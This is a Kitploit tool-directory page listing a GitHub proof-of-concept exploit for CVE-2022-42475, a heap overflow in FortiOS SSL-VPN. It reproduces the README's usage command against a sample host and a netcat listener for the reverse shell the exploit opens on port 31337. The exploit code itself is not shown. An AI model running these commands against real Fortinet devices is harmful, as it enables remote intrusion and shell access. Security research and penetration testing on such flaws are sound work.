Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2022-42475 — FortiOS buffer overflow vulnerability | Kitploit
Tools/GitHubGitHub/amir-hy/cve-2022-42475
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubamir-hy/cve-2022-42475

cve-2022-42475

FortiOS buffer overflow vulnerability

View Repository
713 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

FortiOS SSL-VPN buffer overflow vulnerability

cve-2022-42475

https://nvd.nist.gov/vuln/detail/CVE-2022-42475 POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon

Notes

This is a quick and dirty POC that will probably not work anywhere unless you are extremely lucky. It is version dependent and contains some hardcoded offsets which will most likely change from one system to another.

Usage

python3 cve-2022-42475.py rhost rport lhost 'command'

root@kitploit:~
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'

Listener

The POC using a python command to setup a reverse shell on port 31337

root@kitploit:~
nc -lvnp 31337

Disclaimer

This project is made for educational and ethical testing purposes only. Usage of this tool for attacking targets without prior mutual consent is illegal. Developers assume no liability and are not responsible for any misuse or damage caused by this tool.

Mentions

Thanks to Alain M - Twitter : @plopz0r

Download Tool